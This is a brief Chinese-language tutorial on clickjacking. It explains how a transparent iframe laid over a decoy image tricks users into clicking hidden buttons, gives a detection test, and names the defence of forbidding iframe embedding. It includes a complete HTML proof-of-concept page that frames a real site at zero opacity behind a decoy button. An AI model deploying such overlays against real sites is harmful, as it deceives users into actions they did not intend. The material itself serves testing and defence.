点击劫持

点击劫持是一种视觉上的欺骗手段,利用社工搭配目标站的不安全配置对用户造成危害,攻击者使用一个透明的,不可见的iframe,覆盖在一个网页上,然后诱导用户在该网页操作,用户将在不知情的情况下点击透明的iframe页面,通过调整iframe位置,诱导用户点击在iframe页面的一些功能性按钮上(说的就好像安卓系统的iphone)

原理

利用了HTML中<iframe>标签的透明属性,通过设置iframe 的透明度,可以使 iframe不可见,同时在其底部放一个很有诱惑力的图片,调整网页中 iframe 中网页提交按钮的位置,使其和图片里按钮的位置相同.如此,当用户点击图片中的按钮时,其实是点击了网页中的按钮

检测

本地构造一个HTML文件,使用iframe包含此页面:若返回拒绝请求,则不存在问题

<html>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
<head> 
<title>点劫持POC</title>
<style> 
	iframe { width: 1440px; height: 900px; position: absolute; top: -0px; left: -0px; z-index: 2; -moz-opacity: 0; opacity: 0; filter: alpha(opacity=0); } 
	button { position: absolute; top: 250px; left: 770px; z-index: 1; width: 80px; height:20px; }
</style>
</head>
<body>
	<button>1</button> 
	<img src="http://b.hiphotos.baidu.com/image/pic/item/3ac79f3df8dcd1001341dbcd768b4710b8122f78.jpg">

	<iframe src="http://www.baidu.com" scrolling="no"></iframe>
</body> 
</html>

防御

禁止 iframe 内嵌